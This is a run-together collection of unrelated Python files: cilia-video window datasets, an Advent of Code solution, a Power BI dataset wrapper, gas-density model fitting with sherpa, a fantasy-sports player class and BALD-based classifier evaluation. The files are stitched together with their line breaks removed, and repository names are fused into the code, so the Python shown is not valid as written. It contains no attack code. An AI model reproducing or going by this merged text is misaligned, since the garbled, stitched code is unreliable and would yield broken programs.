self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2]//self.windowWidth frameSeparator = (array.shape[1]//self.windowHeight) * horFrames row = ((tempIndex % frameSeparator) // horFrames) * self.windowHeight col = (tempIndex % horFrames) * self.windowWidth obs = array[tempIndex // frameSeparator, row:(row+self.windowHeight), col:(col+self.windowWidth), newaxis].astype(uint8) if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into overlapping mxn windows of individual frames @param source directory containing the source videos @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class overlapWindowDataset(Dataset): def __init__(self, source, m,
n, transform=None): self.source = source self.videos = os.listdir(source) self.videos.sort() self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append(array.shape[0] * (array.shape[1] - m + 1) * (array.shape[2] - n + 1)) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): startTime = time.time() tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2] - self.windowWidth + 1 frameSeparator = (array.shape[1] - self.windowHeight + 1) * horFrames row = ((tempIndex % frameSeparator) // horFrames) col = tempIndex % horFrames obs = array[tempIndex // frameSeparator, row:(row+self.windowHeight), col:(col+self.windowWidth), newaxis].astype(uint8) if self.transform: obs = self.transform(obs) print("--- %s seconds ---" % (time.time() - startTime)) return obs ''' Cilia dataset split into non-overlapping clips of length clipLength and frame-size mxn @param source directory containing the source videos @param clipLength duration of a clip @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class nonOverlapClipDataset(Dataset): def __init__(self, source, clipLength, m, n, transform=None): self.source = source self.videos = os.listdir(source) self.videos.sort() self.clipLength = clipLength self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i], mmap_mode='r') self.videoLengths.append((array.shape[0] // self.clipLength) * (array.shape[1] // m) * (array.shape[2] // n)) self.transform = transform def __len__(self): return sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo], mmap_mode='r+') horFrames = array.shape[2]//self.windowWidth frameSeparator = (array.shape[1]//self.windowHeight) * horFrames row = ((tempIndex % frameSeparator) // horFrames) * self.windowHeight col = (tempIndex % horFrames) * self.windowWidth time = (tempIndex // frameSeparator) * self.clipLength obs = array[time:(time+self.clipLength), row:(row+self.windowHeight), col:(col+self.windowWidth)] if self.transform: obs = self.transform(obs) return obs ''' Cilia dataset split into overlapping clips of length clipLength and frame-size mxn @param source directory containing the source videos @param clipLength duration of a clip @param m the height of each window @param n the width of each window @param transform transform to be performed on observations @author ''' class overlapClipDataset(Dataset): def __init__(self, source, clipLength, m, n, transform=None): self.source = source self.videos = os.listdir(source) self.videos.sort() self.clipLength = clipLength self.windowHeight = m self.windowWidth = n self.videoLengths = [] for i in range(len(self.videos)): array = load(source + '/' + self.videos[i],mmap_mode='r') self.videoLengths.append((array.shape[0] - clipLength + 1) * (array.shape[1] - m + 1) * (array.shape[2] - n + 1)) self.transform = transform def __len__(self): return
sum(self.videoLengths) def __getitem__(self, index): tempIndex = index currVideo = -1 while(tempIndex >= 0): currVideo += 1 tempIndex -= self.videoLengths[currVideo] tempIndex += self.videoLengths[currVideo] array = load(self.source + '/' + self.videos[currVideo],mmap_mode='r+') horFrames = array.shape[2] - self.windowWidth + 1 frameSeparator = (array.shape[1] - self.windowHeight + 1) * horFrames row = ((tempIndex % frameSeparator) // horFrames) col = tempIndex % horFrames time = (tempIndex // frameSeparator) obs = array[time:(time+self.clipLength), row:(row+self.windowHeight), col:(col+self.windowWidth)] if self.transform: obs = self.transform(obs) return obscodingSince9/Advent-of-Code-2020 entries = [] with open("day01/day01.txt", "r") as f: for entry in f: entries.append(int(entry)) foundSumOf2 = False foundSumOf3 = False for entry in entries: for entry2 in entries: if entry + entry2 == 2020 and not foundSumOf2: print(entry * entry2) foundSumOf2 = True for entry3 in entries: if entry + entry2 + entry3 == 2020 and not foundSumOf3: print(entry * entry2 * entry3) foundSumOf3 = True if foundSumOf3: break if foundSumOf2: break if foundSumOf2 and foundSumOf3: breakSRG.py import sys, os, glob from SRGController import SRGController from SRGConsoleView import SRGConsoleView def main(): """ Main Entry point to program Should be run in a new thread. For linux use 'SRG.py start &' """ #full path for any session.loc files #session.lock files are what keep the background threads running #removing a session.lock file with terminate the background thread loop #session.lock files are in the format session-{sessionId}.lock session_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "session-*") if 'start' in sys.argv: #Can only have one session running at a time #remove any other session.lock files present to close #the old threads for filename in glob.glob(session_path): print("Shutting down open SRG background process ...") #delete the session.lock file which will stop the loop os.remove(filename) #create the view and controller view = SRGConsoleView() controller = SRGController(view) #Start the main loop controller.start() elif 'stop' in sys.argv: #delete the session.lock file which will stop the loop sessions = glob.glob(session_path) #delete all session files if len(sessions) > 0: print("Shutting down SRG background process ...") for filename in sessions: os.remove(filename) else: print("No SRG sessions running.") else: print("GUI not currently supported.\nRun 'SRG.py start' to start the background process or 'SRG.py stop' to stop the process.") if __name__ == '__main__': main()pypowerbi/dataset.py # -*- coding: future_fstrings -*- import json class Dataset: # json keys id_key = 'id' name_key = 'name' add_rows_api_enabled_key = 'addRowsAPIEnabled' configured_by_key = 'configuredBy' is_refreshable_key = 'isRefreshable' is_effective_identity_required_key = 'isEffectiveIdentityRequired' is_effective_identity_roles_required_key = 'isEffectiveIdentityRolesRequired' is_on_prem_gateway_required_key = 'isOnPremGatewayRequired' tables_key = 'tables' def __init__(self, name, dataset_id=None, tables=None, add_rows_api_enabled=None, configured_by=None, is_refreshable=None, is_effective_identity_required=None, is_effective_identity_roles_required=None, is_on_prem_gateway_required=None): self.name = name self.id = dataset_id self.tables = tables self.add_rows_api_enabled = add_rows_api_enabled self.configured_by = configured_by self.is_refreshable = is_refreshable self.is_effective_identity_required 
= is_effective_identity_required self.is_effective_identity_roles_required = is_effective_identity_roles_required self.is_on_prem_gateway_required = is_on_prem_gateway_required @classmethod def from_dict(cls, dictionary): """ Creates a dataset from a dictionary, key values for 'id' and 'name' required :param dictionary: The dictionary to create the dataset from :return: A dataset created from the given dictionary """ # id is required if Dataset.id_key in dictionary: dataset_id = str(dictionary[Dataset.id_key]) # id cannot be whitespace if dataset_id.isspace(): raise RuntimeError('Dataset dict has empty id key value') else: raise RuntimeError('Dataset dict has no id key') # name is required if Dataset.name_key in dictionary: dataset_name = str(dictionary[Dataset.name_key]) # name cannot be whitespace if dataset_name.isspace(): raise RuntimeError('Dataset dict has empty name key value') else: raise RuntimeError('Dataset dict has no name key') # add api enabled is optional if Dataset.add_rows_api_enabled_key in dictionary: add_rows_api_enabled = bool(dictionary[Dataset.add_rows_api_enabled_key]) else: add_rows_api_enabled = None # configured by is optional if Dataset.configured_by_key in dictionary: configured_by = str(dictionary[Dataset.configured_by_key]) else: configured_by = None # is refreshable is optional if Dataset.is_refreshable_key in dictionary: is_refreshable = bool(dictionary[Dataset.is_refreshable_key]) else: is_refreshable = None # is effective identity required is optional if Dataset.is_effective_identity_required_key in dictionary: is_effective_identity_required = bool(dictionary[Dataset.is_effective_identity_required_key]) else: is_effective_identity_required = None # is effective identity roles required is optional if Dataset.is_effective_identity_roles_required_key in dictionary: is_effective_identity_roles_required = bool(dictionary[Dataset.is_effective_identity_roles_required_key]) else: is_effective_identity_roles_required = None # is on prem gateway required is optional if Dataset.is_on_prem_gateway_required_key in dictionary: is_on_prem_gateway_required = bool(dictionary[Dataset.is_on_prem_gateway_required_key]) else: is_on_prem_gateway_required = None return Dataset(dataset_name, dataset_id, add_rows_api_enabled=add_rows_api_enabled, configured_by=configured_by, is_refreshable=is_refreshable, is_effective_identity_required=is_effective_identity_required, is_effective_identity_roles_required=is_effective_identity_roles_required, is_on_prem_gateway_required=is_on_prem_gateway_required) class DatasetEncoder(json.JSONEncoder): def default(self, o): table_encoder = TableEncoder() json_dict = { Dataset.name_key: o.name, Dataset.tables_key: [table_encoder.default(x) for x in o.tables], } return json_dict class Table: name_key = 'name' columns_key = 'columns' measures_key = 'measures' @classmethod def from_dict(cls, dictionary): """ Creates a table from a dictionary, 'name' key value required :param dictionary: The dictionary to create the table from :return: A table created from the dictionary """ # name is required if Table.name_key in dictionary: table_name = str(dictionary[Table.name_key]) # name cannot be whitespace if table_name.isspace(): raise RuntimeError('Table dict has empty name key value') else: raise RuntimeError('Table dict has no name key') # measures are optional if Table.measures_key in dictionary: table_measures = [Measure.from_dict(x) for x in dictionary[Table.measures_key]] else: table_measures = None return Table(name=table_name, measures=table_measures)
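# --- Editor's illustrative sketch (hedged): one way the Dataset/Table/Column classes and
# encoders in this file could be exercised. The payload values below are invented example
# data, not taken from the Power BI API; only the class and encoder signatures come from
# the code above.
import json

sample = {'id': 'abc-123', 'name': 'Sales', 'isRefreshable': True}
ds = Dataset.from_dict(sample)                     # requires 'id' and 'name' keys
ds.tables = [Table('sales_rows', columns=[Column('amount', 'Int64')])]
print(json.dumps(ds, cls=DatasetEncoder))          # serialises name + tables only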
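# --- Editor's sketch (assumption-flagged): the Cilia window Datasets defined earlier
# decompose a flat sample index into (frame, row, col). The helper below re-derives that
# arithmetic for the non-overlapping case so it can be sanity-checked in isolation; the
# name unflatten_window_index is hypothetical and not part of the original code.
def unflatten_window_index(index, frames_shape, m, n):
    """frames_shape is (T, H, W); returns (frame, row, col) of the window's top-left corner."""
    t, h, w = frames_shape
    hor_frames = w // n                       # windows per row of a frame
    frame_separator = (h // m) * hor_frames   # windows per frame
    frame = index // frame_separator
    row = ((index % frame_separator) // hor_frames) * m
    col = (index % hor_frames) * n
    return frame, row, col

# e.g. with 200x200 frames and 50x50 windows there are 16 windows per frame:
# unflatten_window_index(17, (10, 200, 200), 50, 50) -> (1, 0, 50)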
def __init__(self, name, columns=None, measures=None): self.name = name self.columns = columns self.measures = measures class TableEncoder(json.JSONEncoder): def default(self, o): json_dict = { Table.name_key: o.name, } if o.columns is not None: column_encoder = ColumnEncoder() json_dict[Table.columns_key] = [column_encoder.default(x) for x in o.columns] if o.measures is not None: measure_encoder = MeasureEncoder() json_dict[Table.measures_key] = [measure_encoder.default(x) for x in o.measures] return json_dict class Measure: name_key = 'name' expression_key = 'expression' formatstring_key = 'formatString' is_hidden_key = 'isHidden' @classmethod def from_dict(cls, dictionary): # name is required if Measure.name_key in dictionary: measure_name = str(dictionary[Measure.name_key]) # name cannot be whitespace if measure_name.isspace(): raise RuntimeError('Measure dict has empty name key value') else: raise RuntimeError('Measure dict has no name key') # expression is required if Measure.expression_key in dictionary: measure_expression = str(dictionary[Measure.expression_key]) # expression cannot be whitespace if measure_expression.isspace(): raise RuntimeError('Measure dict has empty expression key value') else: raise RuntimeError('Measure dict has no expression key') if Measure.formatstring_key in dictionary: measure_formatstring = str(dictionary[Measure.formatstring_key]) else: measure_formatstring = None if Measure.is_hidden_key in dictionary: measure_is_hidden = bool(dictionary[Measure.is_hidden_key]) else: measure_is_hidden = None return Measure(name=measure_name, expression=measure_expression, formatstring=measure_formatstring, is_hidden=measure_is_hidden) def __init__(self, name, expression, formatstring=None, is_hidden=None): self.name = name self.expression = expression self.formatstring = formatstring self.is_hidden = is_hidden class MeasureEncoder(json.JSONEncoder): def default(self, o): json_dict = { Measure.name_key: o.name, Measure.expression_key: o.expression, } if o.formatstring is not None: json_dict[Measure.formatstring_key] = o.formatstring if o.is_hidden is not None: json_dict[Measure.is_hidden_key] = o.is_hidden return json_dict class Column: name_key = 'name' datatype_key = 'dataType' def __init__(self, name, data_type): self.name = name self.data_type = data_type class ColumnEncoder(json.JSONEncoder): def default(self, o): return { Column.name_key: o.name, Column.datatype_key: o.data_type } class Row: def __init__(self, **kwargs): for key in kwargs: setattr(self, key, kwargs[key]) class RowEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ mbeko/moztrap """ Template tags/filters for sorting. """ from django.template import Library register = Library() @register.filter def url(sort, field): return sort.url(field) @register.filter def dir(sort, field): return sort.dir(field) import sherpa.ui as ui import numpy as np import matplotlib.pyplot as plt from mod_gasdensity import * import plotting ''' Functions for fitting the gas density profile ''' def find_nemodeltype(ne_data, tspec_data, optplt=0): ''' Fit all four gas density model options: beta model, cusped beta model, tied double beta model, double beta model. The returned model type is selected by the choosing the model that produces the lowest reduced chi-squared fit, as determined by Levenberg-Marquardt method in sherpa. 
Args: ----- ne_data (astropy table): observed gas density profile in the form established by set_prof_data() tspec_data (astropy table): observed temperature profile in the form established by set_prof_data() optplt (int): option to plot the fit of the four density models Returns: -------- nemodeltype (string): name of the ne model producing the lowest reduced chi-squared ''' opt_models = ['single_beta', 'cusped_beta', 'double_beta_tied', 'double_beta'] opt_rchisq = [] if optplt == 1: fig1 = plt.figure(1, (8, 8)) fig1.clf() maxy = 0 miny = 999 for ii in range(0, len(opt_models)): nemodel = fitne(ne_data=ne_data, nemodeltype=opt_models[ii], tspec_data=tspec_data) opt_rchisq.append(nemodel['rchisq']) if optplt == 1: if ii == 0: ax0 = fig1.add_subplot(2, 2, ii+1) ax0.set_xscale("log", nonposx='clip') ax0.set_yscale("log", nonposy='clip') if ii == 1: ax1 = fig1.add_subplot(2, 2, ii+1) ax1.set_xscale("log", nonposx='clip') ax1.set_yscale("log", nonposy='clip') if ii == 2: ax2 = fig1.add_subplot(2, 2, ii+1) ax2.set_xscale("log", nonposx='clip') ax2.set_yscale("log", nonposy='clip') if ii == 3: ax3 = fig1.add_subplot(2, 2, ii+1) ax3.set_xscale("log", nonposx='clip') ax3.set_yscale("log", nonposy='clip') # best-fitting density model plotting.plt_densityprof(nemodel=nemodel, ne_data=ne_data, annotations=1) # data plt.errorbar(ne_data['radius'], ne_data['ne'], xerr=[ne_data['radius_lowerbound'], ne_data['radius_upperbound']], yerr=ne_data['ne_err'], marker='o', markersize=2, linestyle='none', color='b') plt.annotate(str(opt_models[ii]), (0.55, 0.9), xycoords='axes fraction') plt.xlabel('r [kpc]') plt.ylabel('$n_{e}$ [cm$^{-3}$]') ymin, ymax = plt.ylim() if ymax > maxy: maxy = ymax if ymin < miny: miny = ymin if optplt == 1: ax0.set_ylim(miny, maxy) ax1.set_ylim(miny, maxy) ax2.set_ylim(miny, maxy) ax3.set_ylim(miny, maxy) plt.tight_layout() opt_rchisq = np.array(opt_rchisq) ind = np.where(opt_rchisq == min(opt_rchisq))[0][0] return opt_models[ind], fig1 def fitne(ne_data, nemodeltype, tspec_data=None): ''' Fits gas number density profile according to selected profile model. The fit is performed using python sherpa with the Levenberg-Marquardt method of minimizing chi-squared . Args: ----- ne_data (astropy table): observed gas density profile in the form established by set_prof_data() tspec_data (astropy table): observed temperature profile in the form established by set_prof_data() Returns: -------- nemodel (dictionary): stores relevant information about the model gas density profile nemodel['type']: ne model type; one of the following: ['single_beta','cusped_beta','double_beta_tied','double_beta'] nemodel['parnames']: names of the stored ne model parameters nemodel['parvals']: parameter values of fitted gas density model nemodel['parmins']: lower error bound on parvals nemodel['parmaxes']: upper error bound on parvals nemodel['chisq']: chi-squared of fit nemodel['dof']: degrees of freedom nemodel['rchisq']: reduced chi-squared of fit nemodel['nefit']: ne model values at radial values matching tspec_data (the observed temperature profile) References: ----------- python sherpa: https://github.com/sherpa/ ''' # remove any existing models and data ui.clean() # load data ui.load_arrays(1, np.array(ne_data['radius']), np.array(ne_data['ne']), np.array(ne_data['ne_err'])) # set guess and boundaries on params given selected model if nemodeltype == 'single_beta': # param estimate betaguess = 0.6 rcguess = 20. # units????? 
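# --- Editor's sketch (hedged): stripped of the plotting, the selection performed by
# find_nemodeltype() above reduces to "fit every candidate and keep the lowest reduced
# chi-squared". A minimal equivalent using the fitne() defined in this module:
import numpy as np

def pick_best_nemodel(ne_data, tspec_data):
    candidates = ['single_beta', 'cusped_beta', 'double_beta_tied', 'double_beta']
    rchisq = [fitne(ne_data, c, tspec_data=tspec_data)['rchisq'] for c in candidates]
    return candidates[int(np.argmin(rchisq))]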
ne0guess = max(ne_data['ne']) # beta model ui.load_user_model(betamodel, "beta1d") ui.add_user_pars("beta1d", ["ne0", "rc", "beta"]) ui.set_source(beta1d) # creates model ui.set_full_model(beta1d) # set parameter values ui.set_par(beta1d.ne0, ne0guess, min=0, max=10.*max(ne_data['ne'])) ui.set_par(beta1d.rc, rcguess, min=0.1, max=max(ne_data['radius'])) ui.set_par(beta1d.beta, betaguess, min=0.1, max=1.) if nemodeltype == 'cusped_beta': # param estimate betaguess = 0.7 rcguess = 5. # [kpc] ne0guess = max(ne_data['ne']) alphaguess = 10. # ???? # beta model ui.load_user_model(cuspedbetamodel, "cuspedbeta1d") ui.add_user_pars("cuspedbeta1d", ["ne0", "rc", "beta", "alpha"]) ui.set_source(cuspedbeta1d) # creates model ui.set_full_model(cuspedbeta1d) # set parameter values ui.set_par(cuspedbeta1d.ne0, ne0guess, min=0.001*max(ne_data['ne']), max=10.*max(ne_data['ne'])) ui.set_par(cuspedbeta1d.rc, rcguess, min=0.1, max=max(ne_data['radius'])) ui.set_par(cuspedbeta1d.beta, betaguess, min=0.1, max=1.) ui.set_par(cuspedbeta1d.alpha, alphaguess, min=0., max=100.) if nemodeltype == 'double_beta': # param estimate ne0guess1 = max(ne_data['ne']) # [cm^-3] rcguess1 = 10. # [kpc] betaguess1 = 0.6 ne0guess2 = 0.01*max(ne_data['ne']) # [cm^-3] rcguess2 = 100. # [kpc] betaguess2 = 0.6 # double beta model ui.load_user_model(doublebetamodel, "doublebeta1d") ui.add_user_pars("doublebeta1d", ["ne01", "rc1", "beta1", "ne02", "rc2", "beta2"]) ui.set_source(doublebeta1d) # creates model ui.set_full_model(doublebeta1d) # set parameter values ui.set_par(doublebeta1d.ne01, ne0guess1, min=0.0001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d.rc1, rcguess1, min=0.1, max=max(ne_data['radius'])) ui.set_par(doublebeta1d.beta1, betaguess1, min=0.1, max=1.) ui.set_par(doublebeta1d.ne02, ne0guess2, min=0.0001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d.rc2, rcguess2, min=10., max=max(ne_data['radius'])) ui.set_par(doublebeta1d.beta2, betaguess2, min=0.1, max=1.) if nemodeltype == 'double_beta_tied': # param estimate ne0guess1 = max(ne_data['ne']) rcguess1 = 10. betaguess1 = 0.6 ne0guess2 = 0.01*max(ne_data['ne']) rcguess2 = 100. # double beta model ui.load_user_model(doublebetamodel_tied, "doublebeta1d_tied") ui.add_user_pars("doublebeta1d_tied", ["ne01", "rc1", "beta1", "ne02", "rc2"]) ui.set_source(doublebeta1d_tied) # creates model ui.set_full_model(doublebeta1d_tied) # set parameter values ui.set_par(doublebeta1d_tied.ne01, ne0guess1, min=0.00001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d_tied.rc1, rcguess1, min=0.1, max=max(ne_data['radius'])) ui.set_par(doublebeta1d_tied.beta1, betaguess1, min=0.1, max=1.) 
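# --- Editor's sketch (assumption): mod_gasdensity is not shown in this file, but the
# parameter names (ne0, rc, beta) match the standard isothermal beta-model profile,
#   n_e(r) = ne0 * (1 + (r/rc)**2) ** (-3*beta/2).
# A stand-in written in sherpa's user-model convention of f(pars, x); the real
# betamodel() may differ.
import numpy as np

def betamodel_sketch(pars, x):
    ne0, rc, beta = pars
    return ne0 * (1.0 + (np.asarray(x, dtype=float) / rc) ** 2) ** (-1.5 * beta)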
ui.set_par(doublebeta1d_tied.ne02, ne0guess2, min=0.00001*max(ne_data['ne']), max=100.*max(ne_data['ne'])) ui.set_par(doublebeta1d_tied.rc2, rcguess2, min=10., max=max(ne_data['radius'])) # fit model ui.fit() # fit statistics chisq = ui.get_fit_results().statval dof = ui.get_fit_results().dof rchisq = ui.get_fit_results().rstat # error analysis ui.set_conf_opt("max_rstat", 1e9) ui.conf() parvals = np.array(ui.get_conf_results().parvals) parmins = np.array(ui.get_conf_results().parmins) parmaxes = np.array(ui.get_conf_results().parmaxes) parnames = [str(x).split('.')[1] for x in list(ui.get_conf_results().parnames)] # where errors are stuck on a hard limit, change error to Inf if None in list(parmins): ind = np.where(parmins == np.array(None))[0] parmins[ind] = float('Inf') if None in list(parmaxes): ind = np.where(parmaxes == np.array(None))[0] parmaxes[ind] = float('Inf') # set up a dictionary to contain useful results of fit nemodel = {} nemodel['type'] = nemodeltype nemodel['parnames'] = parnames nemodel['parvals'] = parvals nemodel['parmins'] = parmins nemodel['parmaxes'] = parmaxes nemodel['chisq'] = chisq nemodel['dof'] = dof nemodel['rchisq'] = rchisq # if tspec_data included, calculate value of ne model at the same radius # positions as temperature profile if tspec_data is not None: if nemodeltype == 'double_beta': nefit_arr = doublebetamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'single_beta': nefit_arr = betamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'cusped_beta': nefit_arr = cuspedbetamodel(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] if nemodeltype == 'double_beta_tied': nefit_arr = doublebetamodel_tied(nemodel['parvals'], np.array(tspec_data['radius'])) # [cm-3] nemodel['nefit'] = nefit_arr return nemodel gym_conservation/__init__.py # Import the envs module so that envs register themselves import gym_conservation.envs guyingbo/multiproc import time import signal signal.signal(signal.SIGTERM, signal.SIG_IGN) time.sleep(100) import pandas as pd from .yfs import yfs from .stats import get_stats, STATS class Player(object): def __init__(self, player_key, player_id, name, status, team, team_key, eligible_positions, selected_position): self.player_key = player_key self.player_id = player_id self.name = name self.status = status self.team = team self.team_key = team_key self.eligible_positions = eligible_positions self.selected_position = selected_position self._stats = None @classmethod def from_dict(cls, player_dict): return Player( player_dict['player_key'], player_dict['player_id'], player_dict['name']['full'], player_dict.get('status', None), player_dict['editorial_team_full_name'], player_dict['editorial_team_key'], set(v['position'] for v in player_dict['eligible_positions']), player_dict['selected_position'], ) def __str__(self): return "Player[{position}]<{name}>".format( name=self.name, position=self.selected_position ) def __repr__(self): return "Player[{position}]('{name}')".format( name=self.name, position=self.selected_position ) @property def stats(self): if self._stats is None: raise Exception("Haven't computed stats yet") df = pd.DataFrame( data=[[self.name, self.eligible_positions, self.selected_position, date] + s.values() for date, s in self._stats[0].items()], columns=['Name', 'Eligible Positions', 'Position', 'Date'] + STATS ) return df, self._stats[1] def set_stats(self, stats): self._stats = stats def is_out(self): return self.status == 'INJ' or self.status == 
'O' lib/evaluate.py import matplotlib import numpy as np import matplotlib.pyplot as plt import sklearn from sklearn.metrics import confusion_matrix, classification_report from sklearn.metrics import precision_recall_curve, plot_precision_recall_curve from sklearn.metrics import average_precision_score import sys import os import config def get_results(y_pred_list, y_test, filename=None, show_plot_PE_MI=True, show_plot_roc=True, show_plot_cm=True, show_plot_pr=True): ''' Input: prediction list from model, y_test. y_test is a 1D Torch array (or 1D numpy for Keras).''' font = {'family' : 'serif', 'weight' : 'normal', 'size' : 15} matplotlib.rc('font', **font) out = y_pred_list # out: output G_X, U_X, log_prob = active_BALD(np.log(out), y_test, 2) if show_plot_PE_MI: start_vis = 0 end_vis = len(y_test) plt.figure(figsize=(12,5)) plt.title('Mean pred, pred_entropy, and MI for samples {from, to}: ' + str(start_vis) + ', ' + str(end_vis)) plt.plot(np.arange(start_vis, end_vis), np.mean(out,axis=0)[start_vis:end_vis,1], 'ko', label='$\hat{y}_{mean}$') plt.plot(np.arange(start_vis, end_vis), y_test[start_vis:end_vis], 'r--', label='${y}_{test}$') plt.plot(np.arange(start_vis, end_vis),G_X[start_vis:end_vis], label='pred_entropy') plt.plot(np.arange(start_vis, end_vis),U_X[start_vis:end_vis], label='MI') plt.xlabel('Feature window') plt.legend() plt.savefig(os.path.join(config.plot_dir, filename + '_PE_MI.pdf' ),bbox_inches='tight') plt.show() if show_plot_roc: roc_score = sklearn.metrics.roc_auc_score(y_test, np.mean(out, axis=0)[:,1]) print("mean ROC AUC:", roc_score) plot_roc("Test performance", y_test, np.mean(out, axis=0)[:,1], roc_score, filename, linestyle='--') auc_list = [] for y in y_pred_list: auc_list.append(sklearn.metrics.roc_auc_score(y_test, y[:,1])) print("std ROC AUC:", np.std(auc_list)) if show_plot_pr: plot_pr("Test performance", y_test, np.mean(out, axis=0)[:,1], filename) if show_plot_cm: # Calculate confusion matricies cm_list = [] for i in np.arange(len(out)): cm_list.append(confusion_matrix(y_test, np.argmax(out[i],-1))) cm = [] for item in cm_list: cm.append(item.astype('float') / item.sum(axis=1)[:, np.newaxis] *100) cm_mean = np.mean(cm, axis = 0) # Convert mean to normalised percentage cm_std = np.std(cm, axis = 0) # Standard deviation also in percentage np.set_printoptions(precision=4) class_names= np.array(['Noise', 'Mozz']) # Plot normalized confusion matrix plot_confusion_matrix(cm_mean, std=cm_std, classes=class_names, filename=filename, normalize=False) # plt.tight_layout() # plt.savefig('Graphs/cm_RF_BNN.pdf', bbox_inches='tight') plt.show() return G_X, U_X, log_prob def active_BALD(out, X, n_classes): log_prob = np.zeros((out.shape[0], X.shape[0], n_classes)) score_All = np.zeros((X.shape[0], n_classes)) All_Entropy = np.zeros((X.shape[0],)) for d in range(out.shape[0]): # print ('Dropout Iteration', d) # params = unflatten(np.squeeze(out[d]),layer_sizes,nn_weight_index) log_prob[d] = out[d] soft_score = np.exp(log_prob[d]) score_All = score_All + soft_score #computing F_X soft_score_log = np.log2(soft_score+10e-15) Entropy_Compute = - np.multiply(soft_score, soft_score_log) Entropy_Per_samp = np.sum(Entropy_Compute, axis=1) All_Entropy = All_Entropy + Entropy_Per_samp Avg_Pi = np.divide(score_All, out.shape[0]) Log_Avg_Pi = np.log2(Avg_Pi+10e-15) Entropy_Avg_Pi = - np.multiply(Avg_Pi, Log_Avg_Pi) Entropy_Average_Pi = np.sum(Entropy_Avg_Pi, axis=1) G_X = Entropy_Average_Pi Average_Entropy = np.divide(All_Entropy, out.shape[0]) F_X = Average_Entropy U_X = G_X - 
F_X # G_X = predictive entropy # U_X = MI return G_X, U_X, log_prob def plot_roc(name, labels, predictions, roc_score, filename, **kwargs): fp, tp, _ = sklearn.metrics.roc_curve(labels, predictions) plt.figure(figsize=(4,4)) plt.plot(100*fp, 100*tp, label=name, linewidth=2, **kwargs) plt.xlabel('False positives [%]') plt.ylabel('True positives [%]') plt.title(str(roc_score)) # plt.xlim([-0.5,20]) # plt.ylim([80,100.5]) plt.grid(True) ax = plt.gca() ax.set_aspect('equal') plt.savefig(os.path.join(config.plot_dir, filename + '_ROC.pdf' ),bbox_inches='tight') plt.show() def plot_pr(name, labels, predictions, filename): # Plot precision-recall curves area = average_precision_score(labels, predictions) print('PR-AUC: ', area) precision, recall, _ = precision_recall_curve(labels, predictions) plt.plot(recall, precision) plt.title('AUC={0:0.4f}'.format(area)) plt.xlabel('Recall') plt.ylabel('Precision') plt.savefig(os.path.join(config.plot_dir, filename + '_PR.pdf' ),bbox_inches='tight') plt.show() def plot_confusion_matrix(cm, classes, std, filename=None, normalize=False, cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ # std = std * 100 if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] *100 # std = std.astype('float') / std.sum(axis=1)[:, np.newaxis] *100 print("Normalized confusion matrix") else: print('Confusion matrix, as input by user') print(cm) fig, ax = plt.subplots(figsize=(4,4)) im = ax.imshow(cm, interpolation='nearest', cmap=cmap) # ax.figure.colorbar(im, ax=ax) # We want to show all ticks... ax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), # ... and label them with the respective list entries xticklabels=classes, yticklabels=classes, ylabel='True label', xlabel='Predicted label') # Rotate the tick labels and set their alignment. plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor") # Loop over data dimensions and create text annotations. fmt = '.2f' if normalize else '.2f' fmt_std = '.2f' thresh = cm.max() / 2. for i in range(cm.shape[0]): for j in range(cm.shape[1]): ax.text(j, i, format(cm[i, j], fmt) + '±' + format(std[i, j], fmt_std), ha="center", va="center", color="white" if cm[i, j] > thresh else "black") fig.tight_layout() plt.savefig(os.path.join(config.plot_dir, filename + '_cm.pdf' )) return ax def get_results_multiclass(y_test_CNN, y_pred_CNN, filename, classes): # First plot the default confusion matrix and save to text file. 
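# --- Editor's sketch (hedged): active_BALD() above implements the BALD decomposition
#   MI = H[mean_d p_d] - mean_d H[p_d]
# over d stochastic forward passes. A compact vectorised equivalent that takes
# probabilities (not log-probabilities) of shape (n_samples, n_points, n_classes):
import numpy as np

def bald_scores(probs, eps=1e-14):
    mean_p = probs.mean(axis=0)
    pred_entropy = -np.sum(mean_p * np.log2(mean_p + eps), axis=1)                 # G_X
    expected_entropy = -np.sum(probs * np.log2(probs + eps), axis=2).mean(axis=0)  # F_X
    return pred_entropy, pred_entropy - expected_entropy                           # G_X, U_X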
